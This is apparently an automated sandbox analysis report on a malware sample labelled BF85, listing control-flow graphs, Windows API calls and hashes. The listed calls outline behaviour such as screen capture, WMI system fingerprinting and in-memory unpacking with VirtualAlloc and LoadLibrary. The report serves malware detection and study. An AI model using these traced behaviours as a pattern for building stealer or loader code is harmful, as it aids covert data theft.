52->53 53->28 55 43c3a7-43c3ae 53->55 58->59 60 43bf2e-43bf33 58->60 59->50 60->59 61 43bf39-43bf89 VariantInit 60->61 62 43bf90-43bfaf 61->62 62->62 63 43bfb1-43bfc2 62->63 64 43bfc6-43bfcb 63->64 65 43bfd1-43bfd7 64->65 66 43c1cc-43c1d9 VariantClear 64->66 65->66 67 43bfdd-43bfea 65->67 66->59 68 43c033 67->68 69 43bfec-43bff1 67->69 71 43c035-43c04f call 408160 68->71 70 43c00c-43c010 69->70 72 43c012-43c01d 70->72 73 43c000 70->73 80 43c055-43c05f 71->80 81 43c17e-43c18f 71->81 76 43c026-43c02c 72->76 77 43c01f-43c024 72->77 75 43c001-43c00a 73->75 75->70 75->71 76->75 79 43c02e-43c031 76->79 77->75 79->75 80->81 84 43c065-43c06f 80->84 82 43c191 81->82 83 43c196-43c1a2 81->83 82->83 86 43c1a4 83->86 87 43c1a9-43c1c9 call 408190 call 408170 83->87 85 43c070-43c07e 84->85 88 43c090-43c096 85->88 89 43c080-43c085 85->89 86->87 87->66 92 43c098-43c09b 88->92 93 43c0bd-43c0c9 88->93 91 43c130-43c134 89->91 99 43c136-43c13c 91->99 92->93 95 43c09d-43c0bb 92->95 96 43c0cb-43c0ce 93->96 97 43c148-43c150 93->97 95->91 96->97 100 43c0d0-43c121 96->100 97->99 103 43c152-43c155 97->103 99->81 102 43c13e-43c140 99->102 100->91 102->85 104 43c146 102->104 105 43c157-43c178 103->105 106 43c17a-43c17c 103->106 104->81 105->91 106->91
                                                                            APIs
                                                                            • CoCreateInstance.OLE32(CDCCD3E7,00000000,00000001,?,00000000), ref: 0043BCCC
                                                                            • SysAllocString.OLEAUT32(37C935C6), ref: 0043BD46
                                                                            • CoSetProxyBlanket.COMBASE(?,0000000A,00000000,00000000,00000003,00000003,00000000,00000000), ref: 0043BD84
                                                                            • SysAllocString.OLEAUT32(37C935C6), ref: 0043BDE9
                                                                            • SysAllocString.OLEAUT32(37C935C6), ref: 0043BED0
                                                                            • VariantInit.OLEAUT32(?), ref: 0043BF3E
                                                                            • GetVolumeInformationW.KERNELBASE(?,00000000,00000000,?,00000000,00000000,00000000,00000000), ref: 0043C243
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.2393196202.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000003.00000002.2393196202.0000000000455000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_400000_BF85.jbxd
                                                                            Similarity
                                                                            • API ID: AllocString$BlanketCreateInformationInitInstanceProxyVariantVolume
                                                                            • String ID: M$96$:;$%$F*R($[&h$$e?^$k"@ $n:T8$#~|$#~|
                                                                            • API String ID: 1810270423-2807872674
                                                                            • Opcode ID: b9f6e505c8dc3f742046bcb89f644a5fe799d125bb799c1c1616f98f374443e3
                                                                            • Instruction ID: 0fa8c84a7900d0f22f2d4f21e88135ff08406c7ea1f94cba9a5970d36c475c8e
                                                                            • Opcode Fuzzy Hash: b9f6e505c8dc3f742046bcb89f644a5fe799d125bb799c1c1616f98f374443e3
                                                                            • Instruction Fuzzy Hash: 735202726083408BD714CF68C88176BFBE1EF89314F189A2EE5D597391D778D806CB96
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.2393196202.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000003.00000002.2393196202.0000000000455000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_400000_BF85.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: 9?4<$BYQZ$DASS$F2}0$L$NR@:$R(RW$a$L|
                                                                            • API String ID: 0-2383821011
                                                                            • Opcode ID: d563cf79af37ff0fce69e7e6826500478a3c9b7465da19f7dffa4c8727075802
                                                                            • Instruction ID: 7f7427958d78b94ffc8c4a18595fe2cbb503adca6349e1c34573b0944bc9dd97
                                                                            • Opcode Fuzzy Hash: d563cf79af37ff0fce69e7e6826500478a3c9b7465da19f7dffa4c8727075802
                                                                            • Instruction Fuzzy Hash: 80C21675608350DFD7209F28D8957ABB7E2EFC6314F19892DE4C98B391EB389841CB46

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 580 408880-408891 call 43fba0 583 408ab5-408ab7 ExitProcess 580->583 584 408897-40889e call 4385b0 580->584 587 408ab0 call 440240 584->587 588 4088a4-4088c8 GetCurrentProcessId GetCurrentThreadId 584->588 587->583 590 4088ca-4088cc 588->590 591 4088ce-408972 SHGetSpecialFolderPathW GetForegroundWindow 588->591 590->591 592 408974-408997 591->592 593 408999-4089a8 591->593 592->593 594 4089b0-4089c4 593->594 594->594 595 4089c6-4089f2 call 43eb20 594->595 598 408a00-408a3b 595->598 599 408a74-408a92 call 409ce0 598->599 600 408a3d-408a72 598->600 603 408a94 call 40cdd0 599->603 604 408a9e-408aa5 599->604 600->598 608 408a99 call 40ba80 603->608 604->587 605 408aa7-408aad call 408170 604->605 605->587 608->604
                                                                            APIs
                                                                            • GetCurrentProcessId.KERNEL32 ref: 004088A4
                                                                            • GetCurrentThreadId.KERNEL32 ref: 004088AE
                                                                            • SHGetSpecialFolderPathW.SHELL32(00000000,?,00000010,00000000), ref: 00408955
                                                                            • GetForegroundWindow.USER32 ref: 0040896A
                                                                            • ExitProcess.KERNEL32 ref: 00408AB7
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.2393196202.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000003.00000002.2393196202.0000000000455000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_400000_BF85.jbxd
                                                                            Similarity
                                                                            • API ID: CurrentProcess$ExitFolderForegroundPathSpecialThreadWindow
                                                                            • String ID: 6W01
                                                                            • API String ID: 4063528623-326071965
                                                                            • Opcode ID: 39779329cba8329f932d9f79242290fe4725b3bdf2e9b5d89c9d7ceec3140c35
                                                                            • Instruction ID: 68999dc676c32329d0dd7cdb3a03855c51f4a57e0b82bf1efaa177e53c028fce
                                                                            • Opcode Fuzzy Hash: 39779329cba8329f932d9f79242290fe4725b3bdf2e9b5d89c9d7ceec3140c35
                                                                            • Instruction Fuzzy Hash: A0516A73B443040BD328EF659C46356BA879BC5314F0AC13EA985BB7E2ED78980586CA

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 796 40aa32-40aa35 797 40aa82 796->797 798 40aa37-40aa5f 796->798 799 40aa60-40aa72 798->799 799->799 800 40aa74-40aa7b 799->800 803 40aa00-40aa12 800->803 803->803 804 40aa14-40aa2e 803->804
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.2393196202.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000003.00000002.2393196202.0000000000455000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_400000_BF85.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: MO$MO
                                                                            • API String ID: 0-3148518880
                                                                            • Opcode ID: 15a7f7520f170cbb2b7e14720c3e61eb56271343ee20c45e820ed2ad2248e475
                                                                            • Instruction ID: de3bae81b745c0a1c58d0910fc7dee7dc7ce1027ddf7ad09ed428793afe2e5a8
                                                                            • Opcode Fuzzy Hash: 15a7f7520f170cbb2b7e14720c3e61eb56271343ee20c45e820ed2ad2248e475
                                                                            • Instruction Fuzzy Hash: BB119E742443818BEF148F649D916677FA0EF42320B2499A99C455F3CBC638C511CF69
                                                                            APIs
                                                                            • LdrInitializeThunk.NTDLL(0044316E,00000002,0000002C,?,?,00000018,?,00000000,?,?,?,?,00000000,00000000), ref: 004402EE
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.2393196202.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000003.00000002.2393196202.0000000000455000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_400000_BF85.jbxd
                                                                            Similarity
                                                                            • API ID: InitializeThunk
                                                                            • String ID:
                                                                            • API String ID: 2994545307-0
                                                                            • Opcode ID: 428b37146f2ab8bbef251fdb989594d24ae2c5b49c4db8728953df82dacde34d
                                                                            • Instruction ID: 0c3231226d6b2b3a527619dcc08e6164a4fafcc19f94aab6dc14dc2c5ea58878
                                                                            • Opcode Fuzzy Hash: 428b37146f2ab8bbef251fdb989594d24ae2c5b49c4db8728953df82dacde34d
                                                                            • Instruction Fuzzy Hash: A2E0FE75908316AF9A08CF45C14444EFBE5BFC4714F11CC8DA4D863210D3B0AD46DF82

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 492 75003c-750047 493 75004c-750263 call 750a3f call 750e0f call 750d90 VirtualAlloc 492->493 494 750049 492->494 509 750265-750289 call 750a69 493->509 510 75028b-750292 493->510 494->493 514 7502ce-7503c2 VirtualProtect call 750cce call 750ce7 509->514 512 7502a1-7502b0 510->512 513 7502b2-7502cc 512->513 512->514 513->512 521 7503d1-7503e0 514->521 522 7503e2-750437 call 750ce7 521->522 523 750439-7504b8 VirtualFree 521->523 522->521 525 7505f4-7505fe 523->525 526 7504be-7504cd 523->526 527 750604-75060d 525->527 528 75077f-750789 525->528 530 7504d3-7504dd 526->530 527->528 531 750613-750637 527->531 533 7507a6-7507b0 528->533 534 75078b-7507a3 528->534 530->525 535 7504e3-750505 LoadLibraryA 530->535 540 75063e-750648 531->540 536 7507b6-7507cb 533->536 537 75086e-7508be LoadLibraryA 533->537 534->533 538 750517-750520 535->538 539 750507-750515 535->539 541 7507d2-7507d5 536->541 548 7508c7-7508f9 537->548 542 750526-750547 538->542 539->542 540->528 543 75064e-75065a 540->543 544 750824-750833 541->544 545 7507d7-7507e0 541->545 546 75054d-750550 542->546 543->528 547 750660-75066a 543->547 554 750839-75083c 544->554 549 7507e4-750822 545->549 550 7507e2 545->550 551 750556-75056b 546->551 552 7505e0-7505ef 546->552 553 75067a-750689 547->553 555 750902-75091d 548->555 556 7508fb-750901 548->556 549->541 550->544 557 75056d 551->557 558 75056f-75057a 551->558 552->530 559 750750-75077a 553->559 560 75068f-7506b2 553->560 554->537 561 75083e-750847 554->561 556->555 557->552 563 75057c-750599 558->563 564 75059b-7505bb 558->564 559->540 565 7506b4-7506ed 560->565 566 7506ef-7506fc 560->566 567 750849 561->567 568 75084b-75086c 561->568 575 7505bd-7505db 563->575 564->575 565->566 569 7506fe-750748 566->569 570 75074b 566->570 567->537 568->554 569->570 570->553 575->546
                                                                            APIs
                                                                            • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004), ref: 0075024D
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.2393490313.0000000000750000.00000040.00001000.00020000.00000000.sdmp, Offset: 00750000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_750000_BF85.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: AllocVirtual
                                                                            • String ID: cess$kernel32.dll
                                                                            • API String ID: 4275171209-1230238691
                                                                            • Opcode ID: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
                                                                            • Instruction ID: efcb8ee98aad01e39de568bfd8b2936a347484084617e0ebc35ac954b5512817
                                                                            • Opcode Fuzzy Hash: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
                                                                            • Instruction Fuzzy Hash: 2F528974A00229DFDB64CF58C985BA8BBB1BF09305F1480D9E80DAB351DB74AE99DF50

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 733 40e3d3-40e540 CoInitializeEx * 2
                                                                            APIs
                                                                            • CoInitializeEx.OLE32(00000000,00000002), ref: 0040E3D7
                                                                            • CoInitializeEx.COMBASE(00000000,00000002), ref: 0040E51A
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.2393196202.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000003.00000002.2393196202.0000000000455000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_400000_BF85.jbxd
                                                                            Similarity
                                                                            • API ID: Initialize
                                                                            • String ID:
                                                                            • API String ID: 2538663250-0
                                                                            • Opcode ID: c988e08bd81bdbbbc832e77591d1fe524e628b2a2385e733f966e0820bef1a3a
                                                                            • Instruction ID: b2aa6f84acc7d50c337c606844e5536a7248dcea6e3e3aabb346ed1b6ad7aec1
                                                                            • Opcode Fuzzy Hash: c988e08bd81bdbbbc832e77591d1fe524e628b2a2385e733f966e0820bef1a3a
                                                                            • Instruction Fuzzy Hash: CC41FAB4C10B40AFD370EF3D9A0B7167EB4AB05214F404B2DF9E6966D4E230A4198BD7

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 734 5407a6-5407bf 735 5407c1-5407c3 734->735 736 5407c5 735->736 737 5407ca-5407d6 CreateToolhelp32Snapshot 735->737 736->737 738 5407e6-5407f3 Module32First 737->738 739 5407d8-5407de 737->739 740 5407f5-5407f6 call 540465 738->740 741 5407fc-540804 738->741 739->738 745 5407e0-5407e4 739->745 746 5407fb 740->746 745->735 745->738 746->741
                                                                            APIs
                                                                            • CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 005407CE
                                                                            • Module32First.KERNEL32(00000000,00000224), ref: 005407EE
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.2393295937.0000000000540000.00000040.00001000.00020000.00000000.sdmp, Offset: 00540000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_540000_BF85.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: CreateFirstModule32SnapshotToolhelp32
                                                                            • String ID:
                                                                            • API String ID: 3833638111-0
                                                                            • Opcode ID: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                                                                            • Instruction ID: 0cf283d98efe61e3cd9481b54c82bc3f55ec36781a81dceacc3b71ca884935ef
                                                                            • Opcode Fuzzy Hash: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                                                                            • Instruction Fuzzy Hash: BBF062311017116BD7203AB5988DAAF7AE8FF89769F201528E742910C0DA74F8454A62

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 747 750e0f-750e24 SetErrorMode * 2 748 750e26 747->748 749 750e2b-750e2c 747->749 748->749
                                                                            APIs
                                                                            • SetErrorMode.KERNELBASE(00000400,?,?,00750223,?,?), ref: 00750E19
                                                                            • SetErrorMode.KERNELBASE(00000000,?,?,00750223,?,?), ref: 00750E1E
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.2393490313.0000000000750000.00000040.00001000.00020000.00000000.sdmp, Offset: 00750000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_750000_BF85.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: ErrorMode
                                                                            • String ID:
                                                                            • API String ID: 2340568224-0
                                                                            • Opcode ID: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
                                                                            • Instruction ID: 91e5bb1afddf65779466e5c9cd6eb2ff446c0854dcf93a0569057d7d2a6eb880
                                                                            • Opcode Fuzzy Hash: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
                                                                            • Instruction Fuzzy Hash: 29D0123114512877D7003A94DC09BCD7B1CDF05B63F108411FB0DD9080C7B5994046E5

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 806 40df92-40dfdb CoInitializeSecurity
                                                                            APIs
                                                                            • CoInitializeSecurity.COMBASE(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000), ref: 0040DFA4
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.2393196202.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000003.00000002.2393196202.0000000000455000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_400000_BF85.jbxd
                                                                            Similarity
                                                                            • API ID: InitializeSecurity
                                                                            • String ID:
                                                                            • API String ID: 640775948-0
                                                                            • Opcode ID: 525ce6852620cf2250b72d132fea134f7b330ed63f2d069f63d9c038e588b8ce
                                                                            • Instruction ID: ccd3c5eb67ff0c959232c13284a4feb1b70bc0ce71dfd05ddd5b0dd8dbfc25b4
                                                                            • Opcode Fuzzy Hash: 525ce6852620cf2250b72d132fea134f7b330ed63f2d069f63d9c038e588b8ce
                                                                            • Instruction Fuzzy Hash: AAE04F763843026BE7688B789D57B01228697C5B28F368235F716AF2E5EAB474064909
                                                                            APIs
                                                                            • WSAStartup.WS2_32(00000202), ref: 0040AB46
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.2393196202.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000003.00000002.2393196202.0000000000455000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_400000_BF85.jbxd
                                                                            Similarity
                                                                            • API ID: Startup
                                                                            • String ID:
                                                                            • API String ID: 724789610-0
                                                                            • Opcode ID: b187d8107ffde8e05c7d0a09cdfc1bb296f851924af62c815b9bdc52e44f9908
                                                                            • Instruction ID: 8daa5b18d499817a70b2f557c0c6df6f58e6f2abf740e83111143c9212bc1643
                                                                            • Opcode Fuzzy Hash: b187d8107ffde8e05c7d0a09cdfc1bb296f851924af62c815b9bdc52e44f9908
                                                                            • Instruction Fuzzy Hash: 0AE02B7A5D5104BBF2486751FD4FC563616BB4330AB08413DFC185017BD6511426C66A
                                                                            APIs
                                                                            • RtlFreeHeap.NTDLL(?,00000000,?,004402AB,?,0040B9C7,00000000,00000001), ref: 0043EB60
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.2393196202.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000003.00000002.2393196202.0000000000455000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_400000_BF85.jbxd
                                                                            Similarity
                                                                            • API ID: FreeHeap
                                                                            • String ID:
                                                                            • API String ID: 3298025750-0
                                                                            • Opcode ID: 81edc790b0ddca4267d7eff7df3f20d03a026a9a6739d0257eb6886926d10809
                                                                            • Instruction ID: 6306fd139b63709815d779222b474fbda691f96f30962fae2caf2063fc0eb5d0
                                                                            • Opcode Fuzzy Hash: 81edc790b0ddca4267d7eff7df3f20d03a026a9a6739d0257eb6886926d10809
                                                                            • Instruction Fuzzy Hash: FDD0C931445536FBC6102F28BC06BCB3B94EF497A5F0708A5F540AA075E725DC918AD8
                                                                            APIs
                                                                            • GetForegroundWindow.USER32 ref: 004404BF
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.2393196202.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000003.00000002.2393196202.0000000000455000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_400000_BF85.jbxd
                                                                            Similarity
                                                                            • API ID: ForegroundWindow
                                                                            • String ID:
                                                                            • API String ID: 2020703349-0
                                                                            • Opcode ID: ac82542d7ead4e5736e61cdedea6fc5be5df443e6220e35db9291a32a896b3cb
                                                                            • Instruction ID: 7f86c14d6ce35f706de72b94d0a04e46592ace6e5707a2a12f6891b8fa8e10aa
                                                                            • Opcode Fuzzy Hash: ac82542d7ead4e5736e61cdedea6fc5be5df443e6220e35db9291a32a896b3cb
                                                                            • Instruction Fuzzy Hash: 15E0E2B9900214DBEB44CF68FC9592933B5EB8B3093040439E202C3362EA34E602CF59
                                                                            APIs
                                                                            • RtlAllocateHeap.NTDLL(?,00000000,?,E931068D,004089CF,6W01), ref: 0043EB30
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.2393196202.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000003.00000002.2393196202.0000000000455000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_400000_BF85.jbxd
                                                                            Similarity
                                                                            • API ID: AllocateHeap
                                                                            • String ID:
                                                                            • API String ID: 1279760036-0
                                                                            • Opcode ID: 79e8824736e673c164acaa36c8672ab8da0624bb6b492fb9ad0aed697a58ad7a
                                                                            • Instruction ID: faa30900258afa928b287b4fa720072893bcbdc8cd762d9751037a3417221d58
                                                                            • Opcode Fuzzy Hash: 79e8824736e673c164acaa36c8672ab8da0624bb6b492fb9ad0aed697a58ad7a
                                                                            • Instruction Fuzzy Hash: 91C04C31045120ABD5506B15EC05BC63B54DF852A5F020065B105660718660ACC2C698
                                                                            APIs
                                                                            • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000040), ref: 005404B6
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.2393295937.0000000000540000.00000040.00001000.00020000.00000000.sdmp, Offset: 00540000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_540000_BF85.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: AllocVirtual
                                                                            • String ID:
                                                                            • API String ID: 4275171209-0
                                                                            • Opcode ID: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                                                                            • Instruction ID: 50dd362a1b8c8ae9f1864809fe64922e881f4706fdd5c4cbaf7c294925ff0706
                                                                            • Opcode Fuzzy Hash: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                                                                            • Instruction Fuzzy Hash: 6B112B79A40208EFDB01DF98C985E98BFF5AF08350F158094FA489B362D375EA50DF80
                                                                            APIs
                                                                            • CoCreateInstance.COMBASE(CDCCD3E7,00000000,00000001,?,00000000), ref: 0078BF33
                                                                            • SysAllocString.OLEAUT32(37C935C6), ref: 0078BFAD
                                                                            • CoSetProxyBlanket.COMBASE(?,0000000A,00000000,00000000,00000003,00000003,00000000,00000000), ref: 0078BFEB
                                                                            • SysAllocString.OLEAUT32(37C935C6), ref: 0078C050
                                                                            • SysAllocString.OLEAUT32(37C935C6), ref: 0078C137
                                                                            • VariantInit.OLEAUT32(?), ref: 0078C1A5
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.2393490313.0000000000750000.00000040.00001000.00020000.00000000.sdmp, Offset: 00750000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_750000_BF85.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: AllocString$BlanketCreateInitInstanceProxyVariant
                                                                            • String ID: M$96$:;$%$F*R($[&h$$e?^$k"@ $n:T8$#~|$#~|
                                                                            • API String ID: 65563702-2807872674
                                                                            • Opcode ID: 9f1f51344e39299604904236268e70905638ee0f88f663c1ee43faa23c8ba667
                                                                            • Instruction ID: 9ce05062f74439bea65b4c222ef60fb39a6f31539346c6bf29d371e8d885744b
                                                                            • Opcode Fuzzy Hash: 9f1f51344e39299604904236268e70905638ee0f88f663c1ee43faa23c8ba667
                                                                            • Instruction Fuzzy Hash: F252F0726483408BD724DF28C8917AFBBE1EFC5314F188A2DE5999B391D778D806CB52
                                                                            APIs
                                                                            • GetDC.USER32(00000000), ref: 00436989
                                                                            • GetSystemMetrics.USER32(0000004C), ref: 00436999
                                                                            • GetSystemMetrics.USER32(0000004D), ref: 004369A1
                                                                            • GetCurrentObject.GDI32(00000000,00000007), ref: 004369AA
                                                                            • GetObjectW.GDI32(00000000,00000018,?), ref: 004369BA
                                                                            • DeleteObject.GDI32(00000000), ref: 004369C1
                                                                            • CreateCompatibleDC.GDI32(00000000), ref: 004369D0
                                                                            • CreateCompatibleBitmap.GDI32(00000000,?,?), ref: 004369DB
                                                                            • SelectObject.GDI32(00000000,00000000), ref: 004369E7
                                                                            • BitBlt.GDI32(00000000,00000000,00000000,?,?,00000000,?,?,00CC0020), ref: 00436A0A
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.2393196202.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000003.00000002.2393196202.0000000000455000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_400000_BF85.jbxd
                                                                            Similarity
                                                                            • API ID: Object$CompatibleCreateMetricsSystem$BitmapCurrentDeleteSelect
                                                                            • String ID: Y
                                                                            • API String ID: 1298755333-3233089245
                                                                            • Opcode ID: c24b2a11f15356cf646cf834205c4c04271eabb57bf08da4818dca27ea7b735a
                                                                            • Instruction ID: ce6842184c50d62c14bce23637ee5c5f438d7dfa952fd3edf86735d4080956a5
                                                                            • Opcode Fuzzy Hash: c24b2a11f15356cf646cf834205c4c04271eabb57bf08da4818dca27ea7b735a
                                                                            • Instruction Fuzzy Hash: 4A81C33A158310EFD7489FB4AC49A3B7BA5FB8A352F050C3CF546D2290C73995168B2B
                                                                            APIs
                                                                            • RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000000E,00000000,00000000), ref: 004251AA
                                                                            • RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000000E,00000000,00000000), ref: 00425243
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.2393196202.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000003.00000002.2393196202.0000000000455000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_400000_BF85.jbxd
                                                                            Similarity
                                                                            • API ID: EnvironmentExpandStrings
                                                                            • String ID: +$e$+$e$%\)R$,X*^$.T'j$1D6Z$:@&F$?P:V$C`<f$XY$]RB
                                                                            • API String ID: 237503144-2846770461
                                                                            • Opcode ID: be84ad2a2dc8deef5579fea24953012850529ab1ccaeb00d1e318e8ad6242404
                                                                            • Instruction ID: b6d59b0557f70d7ec2d4011febfa6e18cf4a5b2df19338a98cc8181bc2575411
                                                                            • Opcode Fuzzy Hash: be84ad2a2dc8deef5579fea24953012850529ab1ccaeb00d1e318e8ad6242404
                                                                            • Instruction Fuzzy Hash: E7F1EDB4208350DFD310DF69E89166BBBE0FFC5314F54892DE5958B362E7B88906CB46
                                                                            APIs
                                                                            • FreeLibrary.KERNEL32(?), ref: 00419CE7
                                                                            • FreeLibrary.KERNEL32(?), ref: 00419D24
                                                                              • Part of subcall function 004402C0: LdrInitializeThunk.NTDLL(0044316E,00000002,0000002C,?,?,00000018,?,00000000,?,?,?,?,00000000,00000000), ref: 004402EE
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.2393196202.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000003.00000002.2393196202.0000000000455000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_400000_BF85.jbxd
                                                                            Similarity
                                                                            • API ID: FreeLibrary$InitializeThunk
                                                                            • String ID: ~|$SP$if$#v$L|$pv$tj$vt
                                                                            • API String ID: 764372645-223891037
                                                                            • Opcode ID: 6f3e0809db8a7ee577943ce01a0a1cb86fff2ea56a37afda839586e8e533a568
                                                                            • Instruction ID: c1c817f51924b2b6e01bbc71c3bfe870e6f9d21007064de5033cd7ab66586395
                                                                            • Opcode Fuzzy Hash: 6f3e0809db8a7ee577943ce01a0a1cb86fff2ea56a37afda839586e8e533a568
                                                                            • Instruction Fuzzy Hash: 5D624770609310AFE724CB15DC9176BB7E2EFC5314F18862DF495973A1D378AC858B4A
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.2393196202.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000003.00000002.2393196202.0000000000455000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_400000_BF85.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: $@7F$(X#^$+\1R$-T,j$2E1G$4D2Z$8I>K$T`Sf$Wdz$&$$L|$qs$uVw
                                                                            • API String ID: 0-3175375482
                                                                            • Opcode ID: b98f95cc8d7a7bfe044da580c8a45b468910242ccf89acd057331744f3faff64
